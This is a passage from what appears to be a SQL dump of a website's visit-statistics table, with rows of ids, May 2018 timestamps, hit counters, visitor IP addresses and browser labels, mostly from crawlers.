1,1,0,0,'54.36.148.164','other'),(240428,1525462386,1,1,0,0,'54.36.148.74','other'),(240429,1525462605,1,1,0,0,'54.36.148.129','other'),(240430,1525462741,1,1,0,0,'54.36.148.157','other'),(240431,1525462760,1,1,0,0,'8.29.198.26','other'),(240432,1525462765,1,1,0,0,'130.180.218.227','chrome'),(240433,1525462798,2,2,0,0,'216.244.66.237','other'),(240434,1525463042,1,1,0,0,'54.36.149.27','other'),(240435,1525463353,1,1,0,0,'54.36.148.161','other'),(240436,1525463414,1,1,0,0,'178.154.171.88','other'),(240437,1525463655,1,1,0,0,'54.36.149.77','other'),(240438,1525463736,1,1,0,0,'141.8.142.74','other'),(240439,1525463954,1,1,0,0,'54.36.148.206','other'),(240440,1525464003,1,1,0,0,'54.36.149.95','other'),(240441,1525464046,1,1,0,0,'54.36.148.238','other'),(240442,1525464094,4,4,0,0,'216.244.66.237','other'),(240443,1525464134,1,1,0,0,'54.36.149.7','other'),(240444,1525464310,1,1,0,0,'54.36.148.152','other'),(240445,1525464563,1,1,0,0,'54.36.149.75','other'),(240446,1525464588,1,1,0,0,'54.36.149.33','other'),(240447,1525464632,1,1,0,0,'54.36.148.121','other'),(240448,1525464854,1,1,0,0,'54.36.149.99','other'),(240449,1525465043,2,2,0,0,'54.36.148.12','other'),(240450,1525465047,1,1,0,0,'54.36.149.25','other'),(240451,1525465246,1,1,0,0,'40.77.167.105','other'),(240452,1525465407,1,1,0,0,'54.36.148.129','other'),(240453,1525465413,1,1,0,0,'207.46.13.50','other'),(240454,1525465414,1,1,0,0,'54.36.148.32','other'),(240455,1525465482,1,1,0,0,'176.48.62.19','firefox'),(240456,1525465488,1,1,0,0,'178.154.171.88','other'),(240457,1525465745,2,2,0,0,'216.244.66.237','other'),(240458,1525466171,1,1,0,0,'54.36.148.81','other'),(240459,1525466187,1,1,0,0,'54.36.148.67','other'),(240460,1525466283,1,1,0,0,'141.8.142.74','other'),(240461,1525466470,1,1,0,0,'54.36.148.12','other'),(240462,1525466866,1,1,0,0,'91.196.178.104','other'),(240463,1525467299,1,1,0,0,'54.36.149.81','other'),(240464,1525467444,1,1,0,0,'54.36.149.23','other'),(240465,1525467453,1,1,0,0,'54.36.149.12','other'),(240466,1525467507,1,1,0,0,'54.36.148.24','other'),(240467,1525467669,1,1,0,0,'54.36.148.109','other'),(240468,1525467986,1,1,0,0,'8.29.198.27','other'),(240469,1525468032,1,1,0,0,'87.250.224.46','other'),(240470,1525468145,1,1,0,0,'54.36.149.73','other'),(240471,1525468148,1,1,0,0,'54.36.149.26','other'),(240472,1525468297,1,1,0,0,'54.36.149.50','other'),(240473,1525468443,1,1,0,0,'54.36.149.65','other'),(240474,1525468498,1,1,0,0,'54.36.148.105','other'),(240475,1525468596,1,1,0,0,'54.36.149.27','other'),(240476,1525468995,1,1,0,0,'54.36.148.174','other'),(240477,1525469000,2,2,0,0,'216.244.66.237','other'),(240478,1525469024,1,1,0,0,'54.36.149.84','other'),(240479,1525469324,1,1,0,0,'87.250.224.46','other'),(240480,1525469415,1,1,0,0,'54.36.148.91','other'),(240481,1525469480,1,1,0,0,'54.36.149.8','other'),(240482,1525469603,1,1,0,0,'92.113.156.65','chrome'),(240483,1525469833,1,1,0,0,'54.36.149.75','other'),(240484,1525469924,1,1,0,0,'54.36.148.196','other'),(240485,1525469989,1,1,0,0,'54.36.148.116','other'),(240486,1525470136,1,1,0,0,'54.36.148.63','other'),(240487,1525470153,1,1,0,0,'178.154.171.88','other'),(240488,1525470181,1,1,0,0,'54.36.148.155','other'),(240489,1525470236,2,2,0,0,'216.244.66.237','other'),(240490,1525470392,1,1,0,0,'54.36.148.114','other'),(240491,1525470453,1,1,0,0,'54.36.149.14','other'),(240492,1525470593,1,1,0,0,'54.36.148.233','other'),(240493,1525470599,1,1,0,0,'54.36.148.198','other'),(240494,1525470728,1,1,0,0,'54.36.148.226','other'),(240495,1525470884,1,1,0,0,'54.36.148.31','other'),(240496,1525471225,1,1,0,0,'207.46.13.50','other'),(240497,1525471390,1,1,0,0,'54.36.149.17','other'),(240498,1525471557,1,1,0,0,'54.36.148.246','other'),(240499,1525471665,1,1,0,0,'54.36.148.18','other'),(240500,1525471677,1,1,0,0,'54.36.148.224','other'),(240501,1525471688,1,1,0,0,'216.244.66.237','other'),(240502,1525471945,1,1,0,0,'54.36.148.67','other'),(240503,1525472077,1,1,0,0,'54.36.149.78','other'),(240504,1525472106,1,1,0,0,'54.36.148.244','other'),(240505,1525472230,1,1,0,0,'54.36.148.114','other'),(240506,1525472628,1,1,0,0,'54.36.149.92','other'),(240507,1525472713,1,1,0,0,'54.36.149.68','other'),(240508,1525472733,1,1,0,0,'141.8.142.74','other'),(240509,1525473059,2,2,0,0,'216.244.66.237','other'),(240510,1525473350,1,1,0,0,'54.36.148.84','other'),(240511,1525473373,1,1,0,0,'54.36.148.105','other'),(240512,1525473529,1,1,0,0,'54.36.148.68','other'),(240513,1525473592,1,1,0,0,'8.29.198.25','other'),(240514,1525474042,1,1,0,0,'54.36.148.172','other'),(240515,1525474518,1,1,0,0,'54.36.148.46','other'),(240516,1525474683,1,1,0,0,'54.36.148.131','other'),(240517,1525474717,1,1,0,0,'54.36.148.122','other'),(240518,1525474902,1,1,0,0,'54.36.148.146','other'),(240519,1525474949,1,1,0,0,'54.36.148.51','other'),(240520,1525475022,1,1,0,0,'54.36.148.25','other'),(240521,1525475059,1,1,0,0,'54.36.149.4','other'),(240522,1525475085,1,1,0,0,'54.36.149.63','other'),(240523,1525475168,1,1,0,0,'54.36.148.190','other'),(240524,1525475184,1,1,0,0,'54.36.148.181','other'),(240525,1525475756,1,1,0,0,'54.36.148.42','other'),(240526,1525475911,1,1,0,0,'54.36.148.224','other'),(240527,1525475942,1,1,0,0,'193.106.30.99','firefox'),(240528,1525475986,1,1,0,0,'54.36.149.6','other'),(240529,1525476000,1,1,0,0,'54.36.148.115','other'),(240530,1525476275,1,1,0,0,'54.36.148.152','other'),(240531,1525476283,1,1,0,0,'54.36.149.30','other'),(240532,1525476355,2,2,0,0,'216.244.66.237','other'),(240533,1525476450,1,1,0,0,'54.36.148.232','other'),(240534,1525476466,1,1,0,0,'54.36.148.41','other'),(240535,1525476567,1,1,0,0,'54.36.149.82','other'),(240536,1525476568,1,1,0,0,'54.36.149.99','other'),(240537,1525476722,1,1,0,0,'54.36.149.22','other'),(240538,1525476833,1,1,0,0,'141.8.142.74','other'),(240539,1525476964,1,1,0,0,'54.36.148.156','other'),(240540,1525476978,1,1,0,0,'54.36.148.231','other'),(240541,1525477059,1,1,0,0,'54.36.148.127','other'),(240542,1525477137,1,1,0,0,'178.154.171.88','other'),(240543,1525477542,1,1,0,0,'54.36.148.172','other'),(240544,1525477557,1,1,0,0,'54.36.148.61','other'),(240545,1525477566,1,1,0,0,'54.36.148.23','other'),(240546,1525477735,1,1,0,0,'54.36.149.89','other'),(240547,1525477740,1,1,0,0,'54.36.148.39','other'),(240548,1525477821,1,1,0,0,'216.244.66.237','other'),(240549,1525478634,1,1,0,0,'54.36.148.182','other'),(240550,1525478733,1,1,0,0,'54.36.148.158','other'),(240551,1525478816,1,1,0,0,'8.29.198.27','other'),(240552,1525479109,1,1,0,0,'54.36.149.92','other'),(240553,1525479453,1,1,0,0,'54.36.148.78','other'),(240554,1525479540,1,1,0,0,'54.36.149.55','other'),(240555,1525479581,1,1,0,0,'54.36.149.70','other'),(240556,1525479671,1,1,0,0,'54.36.148.231','other'),(240557,1525479936,1,1,0,0,'54.36.148.45','other'),(240558,1525479996,1,1,0,0,'54.36.148.250','other'),(240559,1525480039,1,1,0,0,'54.36.149.85','other'),(240560,1525480074,1,1,0,0,'54.36.148.217','other'),(240561,1525480377,2,2,0,0,'141.8.142.74','other'),(240562,1525480437,1,1,0,0,'54.36.148.225','other'),(240563,1525480489,1,1,0,0,'54.36.149.83','other'),(240564,1525480523,1,1,0,0,'54.36.148.213','other'),(240565,1525480668,1,1,0,0,'54.36.149.19','other'),(240566,1525480808,1,1,0,0,'54.36.148.105','other'),(240567,1525480827,1,1,0,0,'54.36.149.79','other'),(240568,1525481126,1,1,0,0,'54.36.148.66','other'),(240569,1525481230,1,1,0,0,'54.36.148.59','other'),(240570,1525481664,1,1,0,0,'54.36.149.46','other'),(240571,1525481903,1,1,0,0,'141.8.142.74','other'),(240572,1525481986,2,2,0,0,'216.244.66.237','other'),(240573,1525482563,1,1,0,0,'54.36.148.231','other'),(240574,1525482699,1,1,0,0,'54.36.149.19','other'),(240575,1525482776,1,1,0,0,'54.36.148.40','other'),(240576,1525482941,1,1,0,0,'54.36.148.236','other'),(240577,1525482981,1,1,0,0,'54.36.148.234','other'),(240578,1525483355,2,2,0,0,'216.244.66.237','other'),(240579,1525483558,1,1,0,0,'54.36.148.34','other'),(240580,1525483590,1,1,0,0,'54.36.149.105','other'),(240581,1525483751,1,1,0,0,'54.36.149.45','other'),(240582,1525483953,2,2,0,0,'141.8.142.74','other'),(240583,1525484263,1,1,0,0,'54.36.149.4','other'),(240584,1525484372,1,1,0,0,'54.36.148.199','other'),(240585,1525484420,1,1,0,0,'8.29.198.25','other'),(240586,1525484487,1,1,0,0,'178.154.171.88','other'),(240587,1525484654,4,4,0,0,'216.244.66.237','other'),(240588,1525484701,1,1,0,0,'54.36.148.117','other'),(240589,1525484947,1,1,0,0,'180.76.15.6','other'),(240590,1525485176,1,1,0,0,'54.36.148.202','other'),(240591,1525485353,1,1,0,0,'54.36.149.25','other'),(240592,1525485837,1,1,0,0,'54.36.148.14','other'),(240593,1525485873,1,1,0,0,'178.154.171.88','other'),(240594,1525486355,1,1,0,0,'54.36.148.47','other'),(240595,1525486369,1,1,0,0,'216.244.66.237','other'),(240596,1525486482,1,0,1,0,'66.249.64.28',''),(240597,1525486538,1,1,0,0,'54.36.149.17','other'),(240598,1525486571,1,1,0,0,'54.36.148.186','other'),(240599,1525486630,1,1,0,0,'141.8.142.74','other'),(240600,1525486680,1,1,0,0,'54.36.148.68','other'),(240601,1525486720,1,1,0,0,'54.36.149.83','other'),(240602,1525486757,1,1,0,0,'54.36.148.83','other'),(240603,1525486892,1,1,0,0,'54.36.148.28','other'),(240604,1525487204,1,1,0,0,'54.36.148.157','other'),(240605,1525487352,1,1,0,0,'54.36.149.33','other'),(240606,1525487711,1,1,0,0,'54.36.148.222','other'),(240607,1525487846,1,1,0,0,'54.36.148.13','other'),(240608,1525487869,1,1,0,0,'54.36.148.79','other'),(240609,1525487935,1,1,0,0,'216.244.66.237','other'),(240610,1525488015,1,1,0,0,'54.36.149.75','other'),(240611,1525488218,1,1,0,0,'54.36.148.128','other'),(240612,1525488279,1,1,0,0,'54.36.148.76','other'),(240613,1525488448,1,1,0,0,'54.36.149.59','other'),(240614,1525488662,1,1,0,0,'54.36.148.130','other'),(240615,1525488956,1,1,0,0,'5.45.207.58','other'),(240616,1525489168,2,2,0,0,'216.244.66.237','other'),(240617,1525489521,1,1,0,0,'54.36.148.198','other'),(240618,1525489547,1,1,0,0,'54.36.148.85','other'),(240619,1525489638,1,1,0,0,'8.29.198.27','other'),(240620,1525489708,1,1,0,0,'54.36.148.184','other'),(240621,1525489863,1,1,0,0,'54.36.148.75','other'),(240622,1525489974,1,1,0,0,'54.36.148.71','other'),(240623,1525490123,1,1,0,0,'54.36.149.23','other'),(240624,1525490155,1,1,0,0,'54.36.149.37','other'),(240625,1525490287,1,1,0,0,'54.36.148.153','other'),(240626,1525490623,1,1,0,0,'54.36.149.38','other'),(240627,1525490677,1,1,0,0,'54.36.148.104','other'),(240628,1525490694,1,1,0,0,'54.36.148.84','other'),(240629,1525490710,1,1,0,0,'216.244.66.237','other'),(240630,1525490742,1,1,0,0,'54.36.148.254','other'),(240631,1525490785,1,1,0,0,'54.36.148.180','other'),(240632,1525490793,1,1,0,0,'5.188.211.22','msie'),(240633,1525490984,1,1,0,0,'87.250.224.46','other'),(240634,1525491225,1,1,0,0,'54.36.148.230','other'),(240635,1525491276,1,1,0,0,'54.36.148.157','other'),(240636,1525491493,1,1,0,0,'54.36.148.48','other'),(240637,1525491595,1,1,0,0,'54.36.149.51','other'),(240638,1525491710,1,1,0,0,'54.36.148.130','other'),(240639,1525492066,1,1,0,0,'54.36.148.14','other'),(240640,1525492083,1,1,0,0,'54.36.148.231','other'),(240641,1525492125,1,1,0,0,'54.36.148.224','other'),(240642,1525492130,2,2,0,0,'216.244.66.237','other'),(240643,1525492198,1,1,0,0,'54.36.149.27','other'),(240644,1525492257,1,1,0,0,'54.36.148.251','other'),(240645,1525492346,1,1,0,0,'54.36.148.166','other'),(240646,1525492408,1,1,0,0,'141.8.142.74','other'),(240647,1525492572,1,1,0,0,'54.36.148.149','other'),(240648,1525492610,1,1,0,0,'178.154.171.88','other'),(240649,1525492747,1,1,0,0,'54.36.148.239','other'),(240650,1525493068,1,1,0,0,'54.36.148.242','other'),(240651,1525493080,2,2,0,0,'216.244.66.237','other'),(240652,1525493164,1,1,0,0,'54.36.148.51','other'),(240653,1525493300,1,1,0,0,'54.36.148.171','other'),(240654,1525493367,1,1,0,0,'141.8.142.74','other'),(240655,1525493532,1,1,0,0,'54.36.148.105','other'),(240656,1525493616,1,1,0,0,'54.36.148.206','other'),(240657,1525493682,1,1,0,0,'54.36.148.194','other'),(240658,1525493739,1,1,0,0,'54.36.148.131','other'),(240659,1525493775,1,1,0,0,'54.36.149.15','other'),(240660,1525493907,1,1,0,0,'54.36.149.107','other'),(240661,1525494089,1,1,0,0,'54.36.149.103','other'),(240662,1525494198,1,1,0,0,'54.36.149.16','other'),(240663,1525494213,1,1,0,0,'54.36.148.75','other'),(240664,1525494256,1,1,0,0,'54.36.148.253','other'),(240665,1525494289,1,1,0,0,'54.36.148.140','other'),(240666,1525494332,1,1,0,0,'54.36.149.67','other'),(240667,1525494442,1,1,0,0,'54.36.149.7','other'),(240668,1525494536,1,1,0,0,'54.36.149.64','other'),(240669,1525494603,20,20,0,0,'62.210.101.104','other'),(240670,1525494673,3,3,0,0,'216.244.66.237','other'),(240671,1525494934,1,1,0,0,'54.36.148.63','other'),(240672,1525495086,1,1,0,0,'54.36.149.88','other'),(240673,1525495199,1,1,0,0,'54.36.149.13','other'),(240674,1525495257,1,1,0,0,'8.29.198.25','other'),(240675,1525495406,1,1,0,0,'46.161.9.39','chrome'),(240676,1525495437,1,1,0,0,'54.36.148.158','other'),(240677,1525495555,1,1,0,0,'54.36.149.12','other'),(240678,1525495639,1,1,0,0,'54.36.148.100','other'),(240679,1525495804,1,1,0,0,'87.250.224.46','other'),(240680,1525495872,1,1,0,0,'157.55.39.85','other'),(240681,1525496020,1,1,0,0,'54.36.149.36','other'),(240682,1525496155,2,2,0,0,'216.244.66.237','other'),(240683,1525496266,1,1,0,0,'54.36.148.226','other'),(240684,1525496269,1,1,0,0,'54.36.148.212','other'),(240685,1525496353,1,1,0,0,'54.36.148.179','other'),(240686,1525496751,1,1,0,0,'141.8.142.74','other'),(240687,1525497065,1,1,0,0,'93.179.68.151','chrome'),(240688,1525497407,1,1,0,0,'54.36.148.230','other'),(240689,1525497418,1,1,0,0,'54.36.148.102','other'),(240690,1525497429,1,1,0,0,'54.36.148.175','other'),(240691,1525497487,2,2,0,0,'216.244.66.237','other'),(240692,1525497492,1,1,0,0,'54.36.149.17','other'),(240693,1525497808,2,2,0,0,'91.196.178.81','chrome'),(240694,1525497816,1,1,0,0,'54.36.148.239','other'),(240695,1525498095,6,6,0,0,'144.76.185.181','other'),(240696,1525498271,1,1,0,0,'92.112.33.185','chrome'),(240697,1525498816,1,1,0,0,'37.55.188.57','chrome'),(240698,1525498953,1,1,0,0,'216.244.66.237','other'),(240699,1525499114,1,1,0,0,'193.106.30.99','firefox'),(240700,1525499386,2,2,0,0,'141.8.142.74','other'),(240701,1525500048,1,1,0,0,'46.164.130.92','chrome'),(240702,1525500103,9,9,0,0,'91.196.178.81','chrome'),(240703,1525500179,1,0,1,0,'66.249.64.28',''),(240704,1525500473,1,1,0,0,'8.29.198.27','other'),(240705,1525500715,1,1,0,0,'141.8.142.74','other'),(240706,1525501866,1,1,0,0,'95.132.18.9','firefox'),(240707,1525501873,2,2,0,0,'216.244.66.237','other'),(240708,1525502266,5,5,0,0,'91.196.178.81','chrome'),(240709,1525502905,1,1,0,0,'91.196.179.33','chrome'),(240710,1525503192,1,1,0,0,'91.196.177.46','chrome'),(240711,1525503261,2,2,0,0,'130.180.219.69','chrome'),(240712,1525503310,3,3,0,0,'216.244.66.237','other'),(240713,1525503605,12,12,0,0,'91.196.178.81','chrome'),(240714,1525503849,1,1,0,0,'91.196.178.132','firefox'),(240715,1525504283,1,1,0,0,'91.209.11.236','other'),(240716,1525504468,2,2,0,0,'91.196.178.169','chrome'),(240717,1525504707,3,3,0,0,'216.244.66.237','other'),(240718,1525505152,2,2,0,0,'195.230.119.59','chrome'),(240719,1525505944,1,1,0,0,'180.76.15.25','other'),(240720,1525506056,2,2,0,0,'216.244.66.237','other'),(240721,1525506081,1,1,0,0,'8.29.198.26','other'),(240722,1525506120,1,1,0,0,'37.55.151.188','chrome'),(240723,1525506219,1,1,0,0,'207.46.13.50','other'),(240724,1525506462,1,1,0,0,'95.158.19.251','chrome'),(240725,1525507400,1,1,0,0,'216.244.66.237','other'),(240726,1525507645,1,1,0,0,'178.154.171.88','other'),(240727,1525507717,12,12,0,0,'195.201.23.173','other'),(240728,1525507803,2,2,0,0,'91.196.178.81','chrome'),(240729,1525508880,3,3,0,0,'216.244.66.237','other'),(240730,1525509304,1,1,0,0,'141.8.142.74','other'),(240731,1525509886,3,3,0,0,'216.244.66.237','other'),(240732,1525510043,1,1,0,0,'178.154.171.88','other'),(240733,1525510180,1,1,0,0,'91.196.178.89','chrome'),(240734,1525510465,1,1,0,0,'141.8.142.74','other'),(240735,1525511303,1,1,0,0,'8.29.198.26','other'),(240736,1525511396,2,2,0,0,'91.196.178.68','chrome'),(240737,1525511517,3,3,0,0,'216.244.66.237','other'),(240738,1525511525,1,1,0,0,'108.59.8.80','other'),(240739,1525511619,1,1,0,0,'178.95.128.119','chrome'),(240740,1525512335,2,2,0,0,'178.95.66.254','chrome'),(240741,1525513548,1,1,0,0,'87.250.224.46','other'),(240742,1525514180,1,1,0,0,'178.154.171.88','other'),(240743,1525514204,1,1,0,0,'46.133.66.72','chrome'),(240744,1525514251,1,1,0,0,'165.227.128.168','chrome'),(240745,1525514476,1,1,0,0,'194.44.122.197','chrome'),(240746,1525514892,1,1,0,0,'141.8.142.74','other'),(240747,1525515679,3,3,0,0,'216.244.66.237','other'),(240748,1525516125,1,1,0,0,'91.196.178.98','chrome'),(240749,1525516904,1,1,0,0,'8.29.198.25','other'),(240750,1525517035,1,1,0,0,'40.77.167.150','other'),(240751,1525517104,2,2,0,0,'216.244.66.237','other'),(240752,1525517616,1,1,0,0,'141.8.142.74','other'),(240753,1525518157,1,1,0,0,'193.106.30.99','firefox'),(240754,1525518489,1,1,0,0,'216.244.66.237','other'),(240755,1525518615,1,1,0,0,'178.154.171.88','other'),(240756,1525518807,1,1,0,0,'91.196.177.46','chrome'),(240757,1525519594,1,1,0,0,'46.188.29.95','chrome'),(240758,1525519847,2,2,0,0,'130.180.219.69','chrome'),(240759,1525519860,2,2,0,0,'216.244.66.237','other'),(240760,1525520806,2,2,0,0,'216.244.66.237','other'),(240761,1525522135,1,1,0,0,'8.29.198.25','other'),(240762,1525522498,2,2,0,0,'216.244.66.237','other'),(240763,1525522842,1,1,0,0,'5.89.36.212','other'),(240764,1525523530,2,2,0,0,'216.244.66.237','other'),(240765,1525523623,1,0,1,0,'66.249.70.25',''),(240766,1525524069,1,1,0,0,'66.249.70.27','chrome'),(240767,1525524782,1,1,0,0,'62.205.134.182','other'),(240768,1525525048,4,4,0,0,'141.8.142.74','other'),(240769,1525527277,4,4,0,0,'95.216.19.59','other'),(240770,1525527739,1,1,0,0,'8.29.198.26','other'),(240771,1525527896,1,1,0,0,'37.54.19.14','chrome'),(240772,1525527972,1,1,0,0,'66.249.64.28','chrome'),(240773,1525528543,1,1,0,0,'91.200.124.43','chrome'),(240774,1525528544,1,1,0,0,'91.200.124.44','chrome'),(240775,1525529206,5,5,0,0,'91.196.178.132','chrome'),(240776,1525530453,1,1,0,0,'216.244.66.237','other'),(240777,1525531468,5,5,0,0,'95.216.19.126','other'),(240778,1525531490,1,1,0,0,'207.46.13.217','other'),(240779,1525531622,1,0,1,0,'66.249.64.30',''),(240780,1525531854,2,2,0,0,'192.99.9.147','chrome'),(240781,1525532975,1,1,0,0,'8.29.198.27','other'),(240782,1525532982,2,2,0,0,'91.196.178.161','chrome'),(240783,1525533627,1,1,0,0,'216.244.66.237','other'),(240784,1525534100,2,2,0,0,'176.102.55.124','chrome'),(240785,1525534564,2,2,0,0,'216.244.66.237','other'),(240786,1525535837,2,2,0,0,'91.196.178.161','chrome'),(240787,1525535901,1,1,0,0,'216.244.66.237','other'),(240788,1525536540,1,0,1,0,'66.249.64.29',''),(240789,1525537071,2,2,0,0,'178.92.171.183','chrome'),(240790,1525537136,1,1,0,0,'107.167.104.37','other'),(240791,1525538357,1,1,0,0,'176.102.55.124','chrome'),(240792,1525538570,1,1,0,0,'8.29.198.27','other'),(240793,1525538798,1,1,0,0,'91.196.178.66','firefox'),(240794,1525538985,1,1,0,0,'5.83.17.180','chrome'),(240795,1525541570,1,1,0,0,'207.46.13.217','other'),(240796,1525542582,1,1,0,0,'216.244.66.237','other'),(240797,1525543121,1,0,1,0,'66.249.64.28',''),(240798,1525543477,1,1,0,0,'54.165.59.7','other'),(240799,1525543657,1,1,0,0,'141.8.142.74','other'),(240800,1525543814,1,1,0,0,'8.29.198.26','other'),(240801,1525544328,1,1,0,0,'216.244.66.237','other'),(240802,1525545341,1,1,0,0,'216.244.66.237','other'),(240803,1525545589,1,1,0,0,'178.154.171.88','other'),(240804,1525546509,2,2,0,0,'216.244.66.237','other'),(240805,1525546530,1,1,0,0,'91.196.178.67','firefox'),(240806,1525547306,1,1,0,0,'180.76.15.143','other'),(240807,1525547426,1,0,1,0,'66.249.64.30',''),(240808,1525547521,1,1,0,0,'91.196.178.103','firefox'),(240809,1525547746,1,1,0,0,'94.178.105.26','chrome'),(240810,1525548574,1,1,0,0,'37.73.211.110','chrome'),(240811,1525549293,1,1,0,0,'216.244.66.237','other'),(240812,1525549393,1,1,0,0,'8.29.198.27','other'),(240813,1525549947,1,1,0,0,'178.154.171.88','other'),(240814,1525550258,1,1,0,0,'216.244.66.237','other'),(240815,1525550617,1,1,0,0,'87.250.224.46','other'),(240816,1525551217,1,1,0,0,'216.244.66.237','other'),(240817,1525552952,2,2,0,0,'216.244.66.237','other'),(240818,1525553196,1,0,1,0,'66.249.64.29',''),(240819,1525553463,1,1,0,0,'87.250.224.46','other'),(240820,1525553849,5,5,0,0,'144.76.29.66','other'),(240821,1525554310,1,1,0,0,'216.244.66.237','other'),(240822,1525554649,1,1,0,0,'8.29.198.25','other'),(240823,1525555205,1,0,1,0,'66.249.64.28',''),(240824,1525555566,1,1,0,0,'207.46.13.217','other'),(240825,1525555726,1,0,1,0,'66.249.64.30',''),(240826,1525557311,1,1,0,0,'216.244.66.237','other'),(240827,1525557950,1,0,1,0,'66.249.64.29',''),(240828,1525558623,1,1,0,0,'176.118.48.226','firefox'),(240829,1525558788,1,0,1,0,'66.249.64.30',''),(240830,1525558945,1,1,0,0,'91.196.178.47','chrome'),(240831,1525559210,1,1,0,0,'216.244.66.237','other'),(240832,1525560222,1,1,0,0,'8.29.198.25','other'),(240833,1525560337,1,1,0,0,'141.8.142.74','other'),(240834,1525560705,1,1,0,0,'178.154.171.88','other'),(240835,1525560718,1,1,0,0,'216.244.66.237','other'),(240836,1525561873,3,3,0,0,'216.244.66.237','other'),(240837,1525561923,1,1,0,0,'87.250.224.46','other'),(240838,1525564031,3,3,0,0,'141.8.142.74','other'),(240839,1525564266,1,1,0,0,'193.106.30.99','firefox'),(240840,1525564605,1,0,1,0,'66.249.64.28',''),(240841,1525565187,1,1,0,0,'216.244.66.237','other'),(240842,1525565487,1,1,0,0,'8.29.198.25','other'),(240843,1525566089,1,1,0,0,'91.209.11.236','other'),(240844,1525566820,1,1,0,0,'216.244.66.237','other'),(240845,1525568096,2,2,0,0,'141.8.142.74','other'),(240846,1525568223,1,1,0,0,'216.244.66.237','other'),(240847,1525569246,1,0,1,0,'66.249.64.29',''),(240848,1525569322,2,2,0,0,'216.244.66.237','other'),(240849,1525569975,1,1,0,0,'180.76.15.32','other'),(240850,1525570312,1,1,0,0,'178.154.171.88','other'),(240851,1525570743,1,1,0,0,'54.36.149.78','other'),(240852,1525570771,3,3,0,0,'216.244.66.237','other'),(240853,1525571047,1,1,0,0,'8.29.198.26','other'),(240854,1525571057,1,0,1,0,'66.249.70.29',''),(240855,1525571079,1,1,0,0,'66.249.70.27','chrome'),(240856,1525571091,1,1,0,0,'66.249.64.30','chrome'),(240857,1525571893,1,1,0,0,'54.36.149.71','other'),(240858,1525572036,1,1,0,0,'54.36.148.69','other'),(240859,1525572146,1,1,0,0,'54.36.149.74','other'),(240860,1525572390,1,1,0,0,'69.30.226.234','other'),(240861,1525572529,1,1,0,0,'54.36.148.167','other'),(240862,1525572622,1,1,0,0,'54.36.148.237','other'),(240863,1525572692,1,1,0,0,'54.36.149.66','other'),(240864,1525572733,1,1,0,0,'54.36.149.103','other'),(240865,1525573046,1,1,0,0,'54.36.148.197','other'),(240866,1525573290,1,1,0,0,'46.161.9.39','firefox'),(240867,1525573412,1,1,0,0,'54.36.148.208','other'),(240868,1525573472,1,1,0,0,'54.36.148.86','other'),(240869,1525573513,1,1,0,0,'54.36.149.22','other'),(240870,1525573565,1,1,0,0,'216.244.66.237','other'),(240871,1525574056,1,1,0,0,'54.36.148.138','other'),(240872,1525574240,1,1,0,0,'54.36.148.155','other'),(240873,1525574306,1,1,0,0,'54.36.148.254','other'),(240874,1525574333,1,1,0,0,'54.36.149.51','other'),(240875,1525574372,1,1,0,0,'54.36.148.117','other'),(240876,1525574583,1,1,0,0,'54.36.149.3','other'),(240877,1525574647,1,1,0,0,'54.36.149.100','other'),(240878,1525574840,1,1,0,0,'54.36.149.104','other'),(240879,1525575016,1,1,0,0,'141.8.132.19','other'),(240880,1525575129,1,1,0,0,'193.106.30.99','firefox'),(240881,1525575338,1,1,0,0,'54.36.149.75','other'),(240882,1525575426,1,1,0,0,'216.244.66.237','other'),(240883,1525575713,1,1,0,0,'54.36.149.32','other'),(240884,1525575967,1,1,0,0,'54.36.148.67','other'),(240885,1525576248,1,1,0,0,'54.36.149.13','other'),(240886,1525576318,1,1,0,0,'8.29.198.25','other'),(240887,1525576336,1,1,0,0,'216.244.66.237','other'),(240888,1525576355,1,1,0,0,'54.36.148.104','other'),(240889,1525576429,1,1,0,0,'54.36.148.204','other'),(240890,1525576642,1,1,0,0,'54.36.149.31','other'),(240891,1525576646,1,1,0,0,'54.36.148.32','other'),(240892,1525577046,1,1,0,0,'54.36.148.197','other'),(240893,1525577282,2,2,0,0,'141.8.142.74','other'),(240894,1525577313,1,1,0,0,'216.244.66.237','other'),(240895,1525577438,1,1,0,0,'54.36.148.12','other'),(240896,1525577453,34,34,0,0,'95.216.3.248','other'),(240897,1525577734,1,1,0,0,'54.36.148.42','other'),(240898,1525577773,1,1,0,0,'54.36.149.80','other'),(240899,1525577848,1,1,0,0,'54.36.148.112','other'),(240900,1525577898,1,1,0,0,'54.36.148.201','other'),(240901,1525578164,1,1,0,0,'54.36.148.23','other'),(240902,1525578342,3,3,0,0,'216.244.66.237','other'),(240903,1525578543,1,1,0,0,'54.36.148.161','other'),(240904,1525578949,1,1,0,0,'54.36.148.166','other'),(240905,1525579010,1,1,0,0,'178.154.171.88','other'),(240906,1525579423,1,1,0,0,'54.36.149.31','other'),(240907,1525580170,1,1,0,0,'54.36.148.254','other'),(240908,1525580246,1,1,0,0,'54.36.148.145','other'),(240909,1525580510,1,1,0,0,'54.36.148.70','other'),(240910,1525580553,1,1,0,0,'54.36.148.102','other'),(240911,1525580827,1,1,0,0,'216.244.66.237','other'),(240912,1525580846,1,0,1,0,'66.249.64.28',''),(240913,1525581231,1,1,0,0,'54.36.148.198','other'),(240914,1525581537,1,1,0,0,'54.36.148.162','other'),(240915,1525581880,1,1,0,0,'8.29.198.26','other'),(240916,1525582444,1,1,0,0,'54.36.148.100','other'),(240917,1525583023,1,1,0,0,'216.244.66.237','other'),(240918,1525583203,1,1,0,0,'54.36.148.113','other'),(240919,1525583377,1,1,0,0,'87.250.224.46','other'),(240920,1525583670,1,1,0,0,'54.36.148.118','other'),(240921,1525584399,1,1,0,0,'46.161.9.39','firefox'),(240922,1525584437,1,1,0,0,'216.244.66.237','other'),(240923,1525584576,1,0,1,0,'66.249.64.28',''),(240924,1525584587,1,0,1,0,'66.249.64.29',''),(240925,1525585067,1,1,0,0,'141.8.142.74','other'),(240926,1525585121,1,1,0,0,'54.36.149.45','other'),(240927,1525585439,1,1,0,0,'54.36.149.92','other'),(240928,1525585630,1,1,0,0,'54.36.148.25','other'),(240929,1525585790,1,1,0,0,'54.36.148.185','other'),(240930,1525585806,1,1,0,0,'216.244.66.237','other'),(240931,1525586208,1,1,0,0,'54.36.148.140','other'),(240932,1525586211,1,1,0,0,'54.36.148.188','other'),(240933,1525586428,1,1,0,0,'40.77.167.131','other'),(240934,1525587109,1,1,0,0,'54.36.148.64','other'),(240935,1525587144,3,3,0,0,'216.244.66.237','other'),(240936,1525587153,1,1,0,0,'8.29.198.27','other'),(240937,1525587284,1,1,0,0,'54.36.149.24','other'),(240938,1525587342,2,2,0,0,'178.154.171.88','other'),(240939,1525587701,1,1,0,0,'54.36.148.63','other'),(240940,1525587753,1,0,1,0,'66.249.70.2